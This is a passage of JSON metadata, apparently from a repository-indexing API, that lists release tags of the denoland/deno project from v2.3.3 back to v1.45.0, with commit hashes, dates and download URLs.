/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-